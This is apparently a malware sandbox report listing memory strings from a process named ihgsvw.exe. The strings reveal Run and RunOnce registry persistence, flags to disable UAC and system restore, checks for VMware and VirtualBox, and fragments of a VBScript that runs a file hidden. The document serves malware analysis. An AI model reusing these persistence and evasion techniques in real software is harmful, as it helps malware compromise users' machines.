      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9fd2bf3bc5976752680b7d6t|~
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9fd2bf3bc5976752680b7d6c|m
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9fd3ae6ba444d621ea380d6
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9ea27f5fb536c7d27bfa6df36518953k
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9c720ee97637d6621af97e8247c{
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9c720ee97637d6621af97e8247c8{
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9fd2bf3bc5976752680b7d67{1
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9fe2bf5bb596b6630a89aea0e&{
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9fd3ae6ba444d621ea380d6u{_
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9fd3ae6ba444d621ea380d6d{n
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9ea27f5fb536c7d27bfa6df36518953s{}
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: scriptdir
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9ea27f591
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hkey_local_machine\software\microsoft\windows\currentversion\run
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: array
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: runonce6z?
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9fd2bf3bc5976752680b7d6qzz
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9fe7cde|ze
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hkey_local_machine\software\microsoft\windows\currentversion\rungz`
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hkey_current_user\software\microsoft\windows\currentversion\run
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hkcu64\software\microsoft\windows\currentversion\run
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: disablesysrestore
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9ef3bc2b069
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9fe7fde
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9f80cd4977c777331a38bd69y
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9c720f4bc51747e0aa096e333409353$y-
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: runonceoyh
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: arrayslistjys
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: startup
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9c720f4bc51747e0aa096e333409353
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9eb36c2ab69
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9f80cd4977c777331a38bd6
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: scriptdir7x0
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hkey_current_user\software\microsoft\windows\currentversion\runrx[
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: loop}xf
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: deadline
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mainpe
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9ef20f3a16f5a7d218d90e33b7c
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9dc2be6ac6f6d73369f:g
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hklm64\software\microsoft\windows nt\currentversion\spp\clients%g.
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: scriptdir@gi
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: disableuac
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: exe_c5
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (8xmn
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: reg_szn
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 88mn
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6r2f:
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @h5f=
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @h!f)
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3c$f,
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @a]f%
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3cpfx
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: htvf^
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hulft
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: le6(txf@
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \(8hln
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 8hln
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: reg_sz
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (ehnn
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: h6kes
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \(8xmn
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: haei
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (exnn
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: h2}ee
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: it8nn
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6eem
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 8hln
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (8hln
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3$%d-
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a"xd
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @?cdk
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $88on
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @fyda
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \g$hon
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0x35rdz
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @x(on
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3agdo
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \0x385
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: g$hmn
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 672c:
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m;5c=
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hd.c6
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2%sc[
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3=vc^
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mwicq
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: h qcy
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 67a=
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: reg_szkaq
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @laaw
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: g~gam
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @bza@
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @?paf
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6oau
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vbldr
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6$)`?
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: g+c`i
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @mf`l
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3oy`o
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6v|`b
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3,r`x
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @}u`{
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \inik
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: legt
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \ini_
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: reg_sz]o#
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: h!4n:
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @m7n=
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @w-n3
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6\n"
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: reg_szun[
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user~1\appdata\local\temp\folder10_51\ihgsvw.exe
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\appdata\local\temp\folder10_51\cdjr.ktl'm,
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\appdata\local\temp\folder10_51\cdjr.ktlwm|
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\c:\users\user~1\appdata\local\temp\folder~1\cdjr.ktl
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user~1\appdata\local\temp\folder10_51\update.vbswl\
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: const waitonreturn = true
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9c720f4bc51747e0aa096e333409353version\runonc
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wshshell.run file, hidden, waitonreturn
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: set wshshell = createobject("wscript.shell")0j
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9c720f4bc51747e0aa096e333409353/j2
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9c720f4bc51747e0aa096e333409353^j!
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9fd3ae6ba444d621ea380d6mjp
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9fd2bf3bc5976752680b7d6|jo
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9fd2bf3bc5976752680b7d6soft\windows\currentvekj~
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9fd2df5a1406c4b
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9fd3ae6ba444d621ea380d6\currentversion\polici
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9c720f4bc51747e0aa096e333409353i
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9fd3ae6ba446d62679f?i
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9c720f4bc51747e0ab698fb3f7c.i1
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9c720f4bc51747e0aa096e333409353]i
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9fd2df5a1406c4bli_
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9ef3bf3a765687634b29cd6{in
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9fd2df5a1406c4bji}
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9c720f4bc51747e0ab698fb3f7cm
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9d82cf4917h
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: anti_botkillrh
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9fd3ae6ba444d621ea380d6}h
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hklm64\software\microsoft\windows\currentversion\policies\system
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwaretray.exe
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9fd3ae6ba446d62649f
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9d82cf491
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vboxservice.exe:
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9ef3bc2b069%
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hkcu64\software\microsoft\windows\currentversion\runonce@
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: program managerk
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9cc2ff391
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9fd26e8ba4441
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vbox.exeists
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: anti_sandbox_vm(
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9dc2be6ac6f6d73369fs
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d:\espacefree~
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d:\espacefree
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9fd3ae6ba446d62679f
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9cc2ff391;
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9c720f4bc51747e0ab698fb3f7c&
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9c720f4bc51747e0ab698fb3f7ca
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vboxtray.exel
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: emulator
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9cf20f3a14479613e9f
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: antitask
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hkcu64\software\microsoft\windows\currentversion\policies\system
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: key3857
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \cu6(\k
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: enxbt
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $ehgt
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $6mhbt
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0xm{5m
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @b(at
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6q(at
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: htxat
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0x6x5
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0x6d5
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $ehbt
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mk8et
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: crlf;
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: file ="4
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \0x385*
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: +sh2zk
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m:xet
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3<xet
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @shft
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $m4(et
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $8xft
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $e(et
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (8het
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0x3 5
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: exe_c
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: disabl
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 8het
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 88gt
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cd g$b
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0xmk5~
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6(xht
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ta3%.
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: start
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a&(ht
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (8xgt
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: disablt
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @echo off
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \mshta.exe<
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: variables3
